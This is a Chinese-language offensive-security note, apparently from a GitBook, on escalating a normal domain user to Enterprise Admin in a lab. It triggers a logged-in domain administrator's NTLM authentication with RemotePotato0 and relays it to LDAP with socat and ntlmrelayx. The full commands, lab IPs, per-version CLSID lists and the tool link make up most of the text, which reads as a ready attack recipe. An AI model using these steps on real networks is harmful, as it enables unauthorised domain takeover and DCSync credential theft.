# RemotePotato0+ntlm relay to ldap

#### 原理

滥用 DCOM 激活服务，并触发目标计算机中当前登录的任何用户的 NTLM 身份验证

#### 利用场景：

* 已经获取某个机器的权限，当前用户为普通域用户，但是该机器有高权限用户登录在本机
* 触发高权限用户的NTLM身份验证，并中继到ldap（权限提升，设置基于资源的约束委派...）

#### 环境

```
kali：10.10.10.10
dc：10.10.10.139
受害机Windows server 2019：10.10.10.111
```

`net user "test1" /domain`发现当前用户只是普通域用户

<figure><img src="https://2474992116-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fo0gnu7SjwiL85l4AHJtG%2Fuploads%2FTSG3U8s0Lo5QELRAteMh%2F1684140528763.png?alt=media&#x26;token=8a6028e2-e9d4-44c5-adfb-412b73aa0a9f" alt=""><figcaption></figcaption></figure>

![](C:%5CUsers%5Cice%5CDesktop%5CRain1_lce%5C%E5%9B%BE%E7%89%87%5C1684140528763.png)

`query session`发现有administrator(这里是域管)用户登录

<figure><img src="https://2474992116-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fo0gnu7SjwiL85l4AHJtG%2Fuploads%2FOQlP3nPHnrQz4YYf7lh1%2F1684140613306.png?alt=media&#x26;token=8385e02e-09e8-4057-b706-86bc72abe7c7" alt=""><figcaption></figcaption></figure>

![](C:%5CUsers%5Cice%5CDesktop%5CRain1_lce%5C%E5%9B%BE%E7%89%87%5C1684140613306.png)

#### 利用-权限提升

* 端口重定向，ntlmrelayx监听

```
sudo socat -v TCP-LISTEN:135,fork,reuseaddr TCP:10.10.10.111:9999 &
sudo ntlmrelayx.py -t ldap://10.10.10.139 --no-wcf-server --escalate-user test1
```

<figure><img src="https://2474992116-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fo0gnu7SjwiL85l4AHJtG%2Fuploads%2F7qPavAX2L5i3NIRBaGr2%2F1684140221312.png?alt=media&#x26;token=9445bb19-66b9-4ddd-a692-e446fce7b030" alt=""><figcaption></figcaption></figure>

![](C:%5CUsers%5Cice%5CDesktop%5CRain1_lce%5C%E5%9B%BE%E7%89%87%5C1684140221312.png)

* 使用`RemotePotato0`触发第二个会话的域管用户进行NTLM身份验证

```
.\RemotePotato0.exe -m 0 -r 10.10.10.10 -x 10.10.10.10 -p 9999 -s 2
```

<figure><img src="https://2474992116-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fo0gnu7SjwiL85l4AHJtG%2Fuploads%2FQfmAx2y9M2CA2OrCeSBm%2F1684140472416.png?alt=media&#x26;token=9e9df5b6-becb-457b-aeef-f834e7dec39c" alt=""><figcaption></figcaption></figure>

![](C:%5CUsers%5Cice%5CDesktop%5CRain1_lce%5C%E5%9B%BE%E7%89%87%5C1684140472416.png)

成功后再次`net user "test1" /domain`查看`test1`用户所在组

发现已经成为了`Enterprise Admins(企业系统管理员)`，该组的用户有dcsync的权限

<figure><img src="https://2474992116-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fo0gnu7SjwiL85l4AHJtG%2Fuploads%2FlLv0luKwICLe6MqMwQsI%2F1684140572780.png?alt=media&#x26;token=13146d85-9533-488d-ab3f-d56738f60600" alt=""><figcaption></figcaption></figure>

![](C:%5CUsers%5Cice%5CDesktop%5CRain1_lce%5C%E5%9B%BE%E7%89%87%5C1684140572780.png)

#### CLSID List

各种Windows版本上可用的CLSID列表：

Windows Server 2019

```
{0002DF02-0000-0000-C000-000000000046} - BrowserBroker Class   
{0ea79562-d4f6-47ba-b7f2-1e9b06ba16a4} - AuthBrokerUI 
{5167B42F-C111-47A1-ACC4-8EABE61B0B54} - Easconsent.dll 
{924DC564-16A6-42EB-929A-9A61FA7DA06F} - Authentication UI CredUI Out of Proc Helper for Non-AppContainer Clients  
{934b410c-43e4-415e-9935-fbc081ba93a9} - UserInfoDialog   
{BA441419-0B3F-4FB6-A903-D16CC14CCA44} - CLSID_LockScreenContentionFlyout 
{c58ca859-80bc-48df-8f06-ffa94a405bff} - Picker Host   
{f65817c8-dd85-4136-89f0-b9d12939f2c4} - IsolatedMessageDialogFactory  
{F87B28F1-DA9A-4F35-8EC0-800EFCF26B83} - SPPUIObjectInteractive Class
{f8842f8e-dafe-4b37-9d38-4e0714a61149} - CastServerInteractiveUser
```

Windows Server 2016

```
{924DC564-16A6-42EB-929A-9A61FA7DA06F}
{f65817c8-dd85-4136-89f0-b9d12939f2c4}
{BA441419-0B3F-4FB6-A903-D16CC14CCA44}
{0ea79562-d4f6-47ba-b7f2-1e9b06ba16a4}
{934b410c-43e4-415e-9935-fbc081ba93a9}
{f8842f8e-dafe-4b37-9d38-4e0714a61149}
{0002DF02-0000-0000-C000-000000000046}
{5167B42F-C111-47A1-ACC4-8EABE61B0B54}
{c58ca859-80bc-48df-8f06-ffa94a405bff}
{F87B28F1-DA9A-4F35-8EC0-800EFCF26B83}
```

Windows Server 2008 R2

```
{FCC74B77-EC3E-4dd8-A80B-008A702075A9}
{9BA05972-F6A8-11CF-A442-00A0C90A8F39}
{F87B28F1-DA9A-4F35-8EC0-800EFCF26B83}
```

完整CLSID的列表 --> <http://ohpe.it/juicy-potato/CLSID/>

#### 参考&工具

[antonioCoco/RemotePotato0：Windows 权限从用户升级到域管理员。 (github.com)](https://github.com/antonioCoco/RemotePotato0/)